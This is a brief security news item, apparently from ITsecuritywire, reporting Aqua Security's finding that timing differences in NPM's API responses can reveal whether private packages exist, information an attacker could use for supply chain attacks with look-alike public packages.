Container and cloud-native application security provider Aqua Security warns that the existence of private NPM packages can be disclosed by performing timing attacks.
The security company has found that timing attacks can be launched by an attacker armed with a list of package names to find out whether a company has developed particular NPM packages that aren’t open to the public. An attacker can launch a supply chain attack once they are aware that a private package exists by making public packages that look like genuine packages and tricking users and employees into downloading them.
According to Aqua, the problem is caused by the ‘404 Not Found’ error that NPM’s API returns in response to a request for details about a private package from an unauthenticated user.
Read More: Timing Attacks Can Be Used to Check for Existence of Private NPM Packages
For more such updates follow us on Google News ITsecuritywire News. Please subscribe to our Newsletter for more updates.
